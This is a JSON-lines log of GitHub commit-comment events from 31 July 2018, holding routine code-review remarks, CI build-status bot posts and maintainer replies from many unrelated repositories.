{"id":"8043952376","type":"CommitCommentEvent","actor":{"login":"iaguis"},"repo":{"name":"kinvolk/runtime-tools"},"payload":{"comment":{"id":29903784,"position":11,"line":16,"path":"validation/mounts/mounts.go","commit_id":"cebba6870087b669e9d2b0318bfc193ecaab8e6d","created_at":"2018-07-31T13:07:25Z","updated_at":"2018-07-31T13:07:25Z","author_association":"MEMBER","body":"combination -> combinations"}},"created_at":"2018-07-31T13:07:25Z"}
{"id":"8043952890","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903785,"position":96,"line":126,"path":"chemie/events/api/serializers.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:07:31Z","updated_at":"2018-07-31T13:07:31Z","author_association":"COLLABORATOR","body":"Bedpres"}},"created_at":"2018-07-31T13:07:31Z"}
{"id":"8043956954","type":"CommitCommentEvent","actor":{"login":"olafurpg"},"repo":{"name":"scalameta/scalameta"},"payload":{"comment":{"id":29903804,"position":5,"line":57,"path":"semanticdb/metap/src/main/scala/scala/meta/internal/metap/SyntheticPrinter.scala","commit_id":"ddc7c81e2f8aacd0ebf9c53dfe3d6295b75d883d","created_at":"2018-07-31T13:08:16Z","updated_at":"2018-07-31T13:08:16Z","author_association":"MEMBER","body":"It took me  a while to realize `???` was magic syntax, I thought it referred to original code that called `Predef.???`. Did you consider using a more distinct syntax like `<macro>` instead?"}},"created_at":"2018-07-31T13:08:16Z"}
{"id":"8043957241","type":"CommitCommentEvent","actor":{"login":"igitur"},"repo":{"name":"ClosedXML/ClosedXML"},"payload":{"comment":{"id":29903807,"position":23,"line":309,"path":"ClosedXML/Excel/CalcEngine/Functions/Text.cs","commit_id":"7c3460d01dc9e533a0de44fb40e551f2f940465c","created_at":"2018-07-31T13:08:20Z","updated_at":"2018-07-31T13:08:20Z","author_association":"MEMBER","body":"You should throw one of the existing calc engine exceptions. Choose the one that aligns with what Excel throws."}},"created_at":"2018-07-31T13:08:20Z"}
{"id":"8043957693","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903808,"position":13,"line":10,"path":"chemie/events/api/urls.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:08:25Z","updated_at":"2018-07-31T13:08:25Z","author_association":"COLLABORATOR","body":"Bedpres"}},"created_at":"2018-07-31T13:08:25Z"}
{"id":"8043961632","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903816,"position":30,"line":21,"path":"chemie/events/api/urls.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:09:09Z","updated_at":"2018-07-31T13:09:09Z","author_association":"COLLABORATOR","body":"Bedpres"}},"created_at":"2018-07-31T13:09:09Z"}
{"id":"8043963617","type":"CommitCommentEvent","actor":{"login":"latentPrion"},"repo":{"name":"latentPrion/zambesii"},"payload":{"comment":{"id":29903824,"position":47,"line":692,"path":"core/include/kernel/common/floodplainn/dma.h","commit_id":"c2f1dcc65b3c8ce10c472468d2b378ccc46bc7e2","created_at":"2018-07-31T13:09:29Z","updated_at":"2018-07-31T13:09:29Z","author_association":"OWNER","body":"Uninitialized. "}},"created_at":"2018-07-31T13:09:29Z"}
{"id":"8043969139","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29903838,"position":null,"line":null,"path":null,"commit_id":"3d9ab9ee197e56f58ea27aa429a35278fa9d7a4a","created_at":"2018-07-31T13:10:26Z","updated_at":"2018-07-31T13:10:26Z","author_association":"MEMBER","body":"Ok, I've added the query and transformation scenario. If you fetch all updates (or at least those for hsg-project and frus), it'll be available. The same procedure used with the other transformation scenarios should work. Namely:\r\n\r\n1. Right-click on the desired volume in the Project pane\r\n2. Select \"Transform\" > \"Transform with...\"\r\n3. Select \"Renumber document div and note xml:ids\"\r\n4. If all worked as expected, a \"Transformation problems\" pane should open at the bottom of the window, with just one line, e.g.:\r\n    > File file:/Users/joe/workspace/hsg-project/repos/frus/volumes/frus1865p4.xml was modified by the XQuery Update statement\r\n5. Format & indent the volume\r\n6. Delete the .bak file before committing the file to GitHub. I hope to find a workaround for this step - oXygen isn't respecting the preference here, so I'm going to report the bug / seek support from oXygen.\r\n\r\n<img width=\"742\" alt=\"screen shot 2018-07-31 at 8 02 18 am\" src=\"https://user-images.githubusercontent.com/59118/43461442-207d48f2-9499-11e8-9857-18ae572db1b0.png\">\r\n\r\n<img width=\"602\" alt=\"screen shot 2018-07-31 at 8 02 31 am\" src=\"https://user-images.githubusercontent.com/59118/43461448-239e612e-9499-11e8-934e-2ea4c3becd84.png\">\r\n"}},"created_at":"2018-07-31T13:10:26Z"}
{"id":"8043969203","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903839,"position":13,"line":11,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:10:26Z","updated_at":"2018-07-31T13:10:26Z","author_association":"COLLABORATOR","body":"Linje 5,6,9,10 og 11"}},"created_at":"2018-07-31T13:10:26Z"}
{"id":"8043972785","type":"CommitCommentEvent","actor":{"login":"lauravignoli"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29903847,"position":25,"line":25,"path":"api/src/main/java/org/openmrs/module/msfcore/audit/MSFCoreLog.java","commit_id":"21cb7cc8652ca527768c4fe3282fa71fe424d8d8","created_at":"2018-07-31T13:11:04Z","updated_at":"2018-07-31T13:11:04Z","author_association":"NONE","body":"@kaweesi There's no need to start the entity name with MSFCore, we can just call Audit (as per conversation on slack), and the table can be msfcore_audit"}},"created_at":"2018-07-31T13:11:04Z"}
{"id":"8043974248","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903851,"position":49,"line":49,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:11:19Z","updated_at":"2018-07-31T13:11:19Z","author_association":"COLLABORATOR","body":"Ikke bruk filter når du vil ha ett objekt. Enten bruk Social.objects.get eller get_object_or_404(Social, pk=pk)"}},"created_at":"2018-07-31T13:11:19Z"}
{"id":"8043976750","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903858,"position":56,"line":56,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:11:45Z","updated_at":"2018-07-31T13:11:45Z","author_association":"COLLABORATOR","body":"Se kommentar over på linje 49"}},"created_at":"2018-07-31T13:11:45Z"}
{"id":"8043977284","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29903861,"position":null,"line":null,"path":null,"commit_id":"3d9ab9ee197e56f58ea27aa429a35278fa9d7a4a","created_at":"2018-07-31T13:11:52Z","updated_at":"2018-07-31T13:11:52Z","author_association":"MEMBER","body":"Of course, let me know if you have any problems."}},"created_at":"2018-07-31T13:11:52Z"}
{"id":"8043980584","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903871,"position":68,"line":68,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:12:26Z","updated_at":"2018-07-31T13:12:26Z","author_association":"COLLABORATOR","body":"Se overfor"}},"created_at":"2018-07-31T13:12:26Z"}
{"id":"8043981220","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903872,"position":77,"line":77,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:12:34Z","updated_at":"2018-07-31T13:12:34Z","author_association":"COLLABORATOR","body":"Se overfor"}},"created_at":"2018-07-31T13:12:34Z"}
{"id":"8043981489","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29903873,"position":null,"line":null,"path":null,"commit_id":"fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282","created_at":"2018-07-31T13:12:37Z","updated_at":"2018-07-31T13:12:37Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2332 of 2332 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T13:12:37Z"}
{"id":"8043982036","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903875,"position":87,"line":87,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:12:43Z","updated_at":"2018-07-31T13:12:43Z","author_association":"COLLABORATOR","body":"Bedpres"}},"created_at":"2018-07-31T13:12:43Z"}
{"id":"8043985866","type":"CommitCommentEvent","actor":{"login":"smitsohu"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29903887,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T13:13:24Z","updated_at":"2018-07-31T13:13:24Z","author_association":"COLLABORATOR","body":"Maybe we could temporarily lower privileges just for expand_home() whenever it is called as root? That might be the easiest.\r\n\r\nIMHO there should be no reason why it needs to run with elevated privileges. And in that case EUID_ASSERT() could also go directly into expand_home()."}},"created_at":"2018-07-31T13:13:24Z"}
{"id":"8043985918","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903888,"position":95,"line":94,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:13:25Z","updated_at":"2018-07-31T13:13:25Z","author_association":"COLLABORATOR","body":"Bedpres"}},"created_at":"2018-07-31T13:13:25Z"}
{"id":"8043987348","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903891,"position":99,"line":98,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:13:39Z","updated_at":"2018-07-31T13:13:39Z","author_association":"COLLABORATOR","body":"Se kommentar overfor"}},"created_at":"2018-07-31T13:13:39Z"}
{"id":"8043987959","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903892,"position":103,"line":101,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:13:45Z","updated_at":"2018-07-31T13:13:45Z","author_association":"COLLABORATOR","body":"Bedpres"}},"created_at":"2018-07-31T13:13:45Z"}
{"id":"8043988682","type":"CommitCommentEvent","actor":{"login":"RMorrisby"},"repo":{"name":"AndrewMorrisby/Visual-Studio-Stuff"},"payload":{"comment":{"id":29903894,"position":7,"line":7,"path":"ClassExcercise/ClassExcercise/Program.cs","commit_id":"a15b1fc65026d9e6e3efda7088a876abfe44168b","created_at":"2018-07-31T13:13:52Z","updated_at":"2018-07-31T13:13:52Z","author_association":"COLLABORATOR","body":"It would be better to name your namespace after the problem it relates to (in this case, Project Euler problem 6).\r\nYou should also write some comments above the namespace (or class) explaining what it is supposed to be doing. Doesn't have to be especially long, just long enough to explain. Currently, there's nothing in here that suggests this is for problem 6 - I guessed that!"}},"created_at":"2018-07-31T13:13:52Z"}
{"id":"8043990110","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903899,"position":112,"line":107,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:14:07Z","updated_at":"2018-07-31T13:14:07Z","author_association":"COLLABORATOR","body":"Bedpres linje 106-108"}},"created_at":"2018-07-31T13:14:07Z"}
{"id":"8043991092","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903902,"position":120,"line":113,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:14:16Z","updated_at":"2018-07-31T13:14:16Z","author_association":"COLLABORATOR","body":"Se kommentar overfor"}},"created_at":"2018-07-31T13:14:16Z"}
{"id":"8043992187","type":"CommitCommentEvent","actor":{"login":"Nicofisi"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29903906,"position":24,"line":69,"path":"src/main/java/ch/njol/skript/expressions/ExprIdOf.java","commit_id":"c904c55a27501c9ed681528b9620a3afd64cceb6","created_at":"2018-07-31T13:14:26Z","updated_at":"2018-07-31T13:14:26Z","author_association":"MEMBER","body":"I'm not sure I understand, are you just doing this because the `getMaterial` method was *removed* in 1.13? Or else why not just call it"}},"created_at":"2018-07-31T13:14:26Z"}
{"id":"8043992274","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903907,"position":127,"line":120,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:14:27Z","updated_at":"2018-07-31T13:14:27Z","author_association":"COLLABORATOR","body":"Se kommentar overfor"}},"created_at":"2018-07-31T13:14:27Z"}
{"id":"8043994023","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903910,"position":132,"line":125,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:14:45Z","updated_at":"2018-07-31T13:14:45Z","author_association":"COLLABORATOR","body":"Bedpres linje 125-127"}},"created_at":"2018-07-31T13:14:45Z"}
{"id":"8043994206","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29903911,"position":null,"line":null,"path":null,"commit_id":"dc9202ed81bd7e2e457caf2e091d4b134ca32639","created_at":"2018-07-31T13:14:46Z","updated_at":"2018-07-31T13:14:46Z","author_association":"MEMBER","body":"Note: See http://www.tei-c.org/release/doc/tei-p5-doc/readme-3.4.0.html for the release notes for the current version, and http://www.tei-c.org/release/doc/tei-p5-doc for the other releases. After applying this change and regenerating the .rnc file, I validated several FRUS TEI files and didn't see any new errors or unexpected output. "}},"created_at":"2018-07-31T13:14:46Z"}
{"id":"8043995001","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903913,"position":139,"line":132,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:14:54Z","updated_at":"2018-07-31T13:14:54Z","author_association":"COLLABORATOR","body":"Se kommentar overfor"}},"created_at":"2018-07-31T13:14:54Z"}
{"id":"8043996028","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903919,"position":151,"line":141,"path":"chemie/events/api/views.py","commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:15:06Z","updated_at":"2018-07-31T13:15:06Z","author_association":"COLLABORATOR","body":"Se kommentar overfor"}},"created_at":"2018-07-31T13:15:06Z"}
{"id":"8043996572","type":"CommitCommentEvent","actor":{"login":"RMorrisby"},"repo":{"name":"AndrewMorrisby/Visual-Studio-Stuff"},"payload":{"comment":{"id":29903922,"position":15,"line":15,"path":"ClassExcercise/ClassExcercise/Program.cs","commit_id":"a15b1fc65026d9e6e3efda7088a876abfe44168b","created_at":"2018-07-31T13:15:12Z","updated_at":"2018-07-31T13:15:12Z","author_association":"COLLABORATOR","body":"temp should be renamed - ask yourself what it is supposed to represent. A better name would be SumOfSquares or something like that."}},"created_at":"2018-07-31T13:15:12Z"}
{"id":"8044000203","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29903931,"position":null,"line":null,"path":null,"commit_id":"fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282","created_at":"2018-07-31T13:15:47Z","updated_at":"2018-07-31T13:15:47Z","author_association":"NONE","body":"develop (Myoldmopar) - i386-Windows-7-VisualStudio-14: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fee1ef0cf3e5a62b4436e44cbfbbed181dbc5282-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.png)</a> \n"}},"created_at":"2018-07-31T13:15:47Z"}
{"id":"8044000557","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29903932,"position":null,"line":null,"path":null,"commit_id":"1ea558ce7e6aa70971c9e816d5e5ca810902c981","created_at":"2018-07-31T13:15:51Z","updated_at":"2018-07-31T13:15:51Z","author_association":"COLLABORATOR","body":"Bra jobba! Et par typos, og misbruk av filter metoden til modellene, men ellers mye godt arbeid (Y) "}},"created_at":"2018-07-31T13:15:51Z"}
{"id":"8044000832","type":"CommitCommentEvent","actor":{"login":"yyyc514"},"repo":{"name":"warvariuc/acdcontrol"},"payload":{"comment":{"id":29903933,"position":null,"line":null,"path":null,"commit_id":"a4aaa0490b6e534df44c44217a4994178529d1b5","created_at":"2018-07-31T13:15:54Z","updated_at":"2018-07-31T13:15:54Z","author_association":"NONE","body":"I have this screen and the levels seem to vary from 0 to 1000, so 750 is capping me at only 75% brightness?  Would a PR be accepted?"}},"created_at":"2018-07-31T13:15:54Z"}
{"id":"8044001422","type":"CommitCommentEvent","actor":{"login":"flecoq"},"repo":{"name":"flecoq/NukeExternalControl"},"payload":{"comment":{"id":29903935,"position":null,"line":null,"path":null,"commit_id":"7956a1f74fce6528c528e100b99939917790efab","created_at":"2018-07-31T13:16:01Z","updated_at":"2018-07-31T13:16:01Z","author_association":"OWNER","body":"Hello Daniel, I hope i send this ticket in the good place :)\r\n\r\nMay have a look on my application presentation:\r\nwww.vfxassembler.com\r\n\r\nFor Nuke use, you can read these pages too:\r\nhttp://www.vfxassembler.com/site/pipeline_integration_sharing.html\r\nhttp://www.vfxassembler.com/site/basical_compositing_create.html\r\n\r\nEnjoy :)"}},"created_at":"2018-07-31T13:16:01Z"}
{"id":"8044001989","type":"CommitCommentEvent","actor":{"login":"HarryHeights"},"repo":{"name":"MaxFour/Music-Player"},"payload":{"comment":{"id":29903939,"position":null,"line":null,"path":null,"commit_id":"b690e2fbf173a5ed05394100bd69062abfb8d1ed","created_at":"2018-07-31T13:16:07Z","updated_at":"2018-07-31T13:16:07Z","author_association":"CONTRIBUTOR","body":"You are welcome... Glad I could contribute\n\nOn Tue, Jul 31, 2018, 1:54 PM Max <notifications@github.com> wrote:\n\n> Update README.md\n>\n> Added Privacy Policy (thanks @HarryHeights )\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n>\n> https://github.com/MaxFour/Music-Player/commit/b690e2fbf173a5ed05394100bd69062abfb8d1ed\n>\n"}},"created_at":"2018-07-31T13:16:07Z"}
{"id":"8044005750","type":"CommitCommentEvent","actor":{"login":"iaguis"},"repo":{"name":"kinvolk/runtime-tools"},"payload":{"comment":{"id":29903955,"position":25,"line":1112,"path":"cmd/runtimetest/main.go","commit_id":"cebba6870087b669e9d2b0318bfc193ecaab8e6d","created_at":"2018-07-31T13:16:45Z","updated_at":"2018-07-31T13:16:45Z","author_association":"MEMBER","body":"Should you print the basename of `configMount.Source`?"}},"created_at":"2018-07-31T13:16:45Z"}
{"id":"8044009496","type":"CommitCommentEvent","actor":{"login":"RMorrisby"},"repo":{"name":"AndrewMorrisby/Visual-Studio-Stuff"},"payload":{"comment":{"id":29903968,"position":18,"line":18,"path":"ClassExcercise/ClassExcercise/Program.cs","commit_id":"a15b1fc65026d9e6e3efda7088a876abfe44168b","created_at":"2018-07-31T13:17:25Z","updated_at":"2018-07-31T13:17:25Z","author_association":"COLLABORATOR","body":"You don't actually need to use 'a' here. Your loop makes a go 1, 2, 3, ... to 100. Look at what 'i' is set to each time round the loop. It goes from 1 to 100, incrementing by 1 each time, just as a is."}},"created_at":"2018-07-31T13:17:25Z"}
{"id":"8044010065","type":"CommitCommentEvent","actor":{"login":"m-kostrzewa"},"repo":{"name":"Juniper/contrail-windows-ci"},"payload":{"comment":{"id":29903970,"position":null,"line":null,"path":null,"commit_id":"8f41f84f728286334f0fde0f9f7bcd2b038dba81","created_at":"2018-07-31T13:17:30Z","updated_at":"2018-07-31T13:17:30Z","author_association":"COLLABORATOR","body":"maybe link to shelly repo in comment or something?"}},"created_at":"2018-07-31T13:17:30Z"}
{"id":"8044012827","type":"CommitCommentEvent","actor":{"login":"RMorrisby"},"repo":{"name":"AndrewMorrisby/Visual-Studio-Stuff"},"payload":{"comment":{"id":29903977,"position":27,"line":27,"path":"ClassExcercise/ClassExcercise/Program.cs","commit_id":"a15b1fc65026d9e6e3efda7088a876abfe44168b","created_at":"2018-07-31T13:17:58Z","updated_at":"2018-07-31T13:17:58Z","author_association":"COLLABORATOR","body":"Similarly here, you don't need 'b' because you're making 'i' change value in the same way."}},"created_at":"2018-07-31T13:17:58Z"}
{"id":"8044015920","type":"CommitCommentEvent","actor":{"login":"RMorrisby"},"repo":{"name":"AndrewMorrisby/Visual-Studio-Stuff"},"payload":{"comment":{"id":29903982,"position":32,"line":32,"path":"ClassExcercise/ClassExcercise/Program.cs","commit_id":"a15b1fc65026d9e6e3efda7088a876abfe44168b","created_at":"2018-07-31T13:18:29Z","updated_at":"2018-07-31T13:18:29Z","author_association":"COLLABORATOR","body":"total & grandtotal could be better-named as well."}},"created_at":"2018-07-31T13:18:29Z"}
{"id":"8044055045","type":"CommitCommentEvent","actor":{"login":"bartonjs"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29904086,"position":14,"line":158,"path":"src/System.Security.Cryptography.X509Certificates/src/Internal/Cryptography/Helpers.cs","commit_id":"a86ecc09e5a6c2b91051b198e93bb12af046f777","created_at":"2018-07-31T13:24:59Z","updated_at":"2018-07-31T13:24:59Z","author_association":"MEMBER","body":"I'd call it ValidateDer and remove the parameter.  It avoids the need to write the CER scan rules."}},"created_at":"2018-07-31T13:24:59Z"}
{"id":"8044059491","type":"CommitCommentEvent","actor":{"login":"avilleret"},"repo":{"name":"OSSIA/libossia"},"payload":{"comment":{"id":29904100,"position":20,"line":35,"path":"ci/before_build.ps1","commit_id":"16fcefe3e9d96a6b8f49f72e36f3fc67e0cab3f3","created_at":"2018-07-31T13:25:44Z","updated_at":"2018-07-31T13:25:44Z","author_association":"CONTRIBUTOR","body":"unfortunately, PowerShell takes this as a whole string and then cmake can't parse it :-(\r\nI tried to first split genrator in another variable but there are stil parsing issue"}},"created_at":"2018-07-31T13:25:44Z"}
{"id":"8044060235","type":"CommitCommentEvent","actor":{"login":"Buggerfal"},"repo":{"name":"Buggerfal/cannabis"},"payload":{"comment":{"id":29904102,"position":194,"line":194,"path":"js/main.js","commit_id":"4b39ad54f6823f870fea3299d438d63cc590df24","created_at":"2018-07-31T13:25:52Z","updated_at":"2018-07-31T13:25:52Z","author_association":"OWNER","body":"Done. Var to const"}},"created_at":"2018-07-31T13:25:52Z"}
{"id":"8044061988","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29904108,"position":4,"line":4,"path":"src/io/jiyuujin/java/day27/Log.java","commit_id":"56172d86d9c11af46699298fbabe6f3b5a87e23a","created_at":"2018-07-31T13:26:10Z","updated_at":"2018-07-31T13:26:10Z","author_association":"COLLABORATOR","body":"別クラス作ったんですね、ふむふむナイス"}},"created_at":"2018-07-31T13:26:10Z"}
{"id":"8044063201","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-catalog"},"payload":{"comment":{"id":29904116,"position":1,"line":1,"path":"models/admin_helper.js","commit_id":"168a18b6a71925a5bf984ccf95849c902ddabb08","created_at":"2018-07-31T13:26:21Z","updated_at":"2018-07-31T13:26:21Z","author_association":"COLLABORATOR","body":"Because we are using Boom to build responses here and these functions are used only by the routes.  I would move this file to the `/routes` folder."}},"created_at":"2018-07-31T13:26:21Z"}
{"id":"8044066929","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"FlyingPikachu/Quests"},"payload":{"comment":{"id":29904126,"position":null,"line":null,"path":null,"commit_id":"9dd183838935fc0e6563fb8faa0d544c0017c8a0","created_at":"2018-07-31T13:26:57Z","updated_at":"2018-07-31T13:26:57Z","author_association":"NONE","body":"@FlyingPikachu Any idea when 1.13 builds will begin to be ready for testing? I tried compiling manually since the jenkins isn't compiling newer commits but it failed due to unknown 1.13 imports. \r\n\r\nAlso you perhaps may want to look into how permissions are checked and see if it can be optimized to prevent lag / server crashes. https://github.com/lucko/LuckPerms/issues/1104"}},"created_at":"2018-07-31T13:26:57Z"}
{"id":"8044068317","type":"CommitCommentEvent","actor":{"login":"tktik"},"repo":{"name":"googlehosts/hosts"},"payload":{"comment":{"id":29904131,"position":null,"line":null,"path":null,"commit_id":"27818e18accf4b8c90f5e8119a0b925d22178248","created_at":"2018-07-31T13:27:11Z","updated_at":"2018-07-31T13:27:11Z","author_association":"NONE","body":"load.cn 以前还对host文件求打赏(┬＿┬)"}},"created_at":"2018-07-31T13:27:11Z"}
{"id":"8044068360","type":"CommitCommentEvent","actor":{"login":"smanish01"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29904132,"position":null,"line":null,"path":null,"commit_id":"0883812ecfe74f3a9f6494eca9ce52e6155b563f","created_at":"2018-07-31T13:27:11Z","updated_at":"2018-07-31T13:27:11Z","author_association":"OWNER","body":"test pull comment"}},"created_at":"2018-07-31T13:27:11Z"}
{"id":"8044069677","type":"CommitCommentEvent","actor":{"login":"RMorrisby"},"repo":{"name":"AndrewMorrisby/Visual-Studio-Stuff"},"payload":{"comment":{"id":29904139,"position":45,"line":45,"path":"Class1.cs","commit_id":"bcc47b9d47d6b0a7cdb093726b84108c768767d5","created_at":"2018-07-31T13:27:23Z","updated_at":"2018-07-31T13:27:23Z","author_association":"COLLABORATOR","body":"OK. Remember that a vairable is a bucket that holds one object. Here s2 is holding an object which is a string, which has a value of \"Poor\". Line 46 is \"bool c = s2.Contains(s2);\" . If you read this out, substituting in values where possible, you get \"bool c = \"Poor\".Contains(\"Poor\");\" which is obviously going to be true, and will always be true, because you're not changing anything in there. \r\n\r\nAsk yourself what you want to be comparing against \"Poor\", and change the line so that it becomes \"bool c = <thing to compare>.Contains(s2);\" OR \"bool c = s2.Contains(<thing to compare>);\"\r\n\r\n(when comparing two things like this, it doesn't really matter which is before the .Contains and which is inside the brackets)"}},"created_at":"2018-07-31T13:27:23Z"}
{"id":"8044072140","type":"CommitCommentEvent","actor":{"login":"wongsyrone"},"repo":{"name":"iikira/BaiduPCS-Go"},"payload":{"comment":{"id":29904152,"position":21,"line":25,"path":"pcsliner/clear_windows.go","commit_id":"de3a91fcc151f27b5f0d59d9f4471633b9e052d1","created_at":"2018-07-31T13:27:48Z","updated_at":"2018-07-31T13:27:48Z","author_association":"NONE","body":"pcsliner\\clear_windows.go:25:19: defaultLinerState.ClearScreen undefined (type *liner.State has no field or method ClearScreen)"}},"created_at":"2018-07-31T13:27:48Z"}
{"id":"8044074224","type":"CommitCommentEvent","actor":{"login":"h-o-g-e"},"repo":{"name":"h-o-g-e/tukaitaosu"},"payload":{"comment":{"id":29904156,"position":2,"line":2,"path":"okonomi.txt","commit_id":"87fd7237dfbd23dd6c073660530ab006b695e750","created_at":"2018-07-31T13:28:10Z","updated_at":"2018-07-31T13:28:10Z","author_association":"OWNER","body":"無難で面白くないなぁ"}},"created_at":"2018-07-31T13:28:10Z"}
